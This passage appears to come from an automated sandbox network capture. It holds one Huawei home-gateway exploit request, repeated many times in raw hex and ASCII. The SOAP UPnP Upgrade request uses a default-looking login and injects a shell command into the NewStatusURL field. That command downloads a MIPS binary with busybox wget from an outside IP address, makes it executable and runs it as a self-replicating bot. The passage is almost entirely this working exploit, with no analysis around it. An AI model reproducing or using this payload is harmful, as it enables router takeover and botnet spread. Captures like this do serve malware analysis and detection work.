61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope 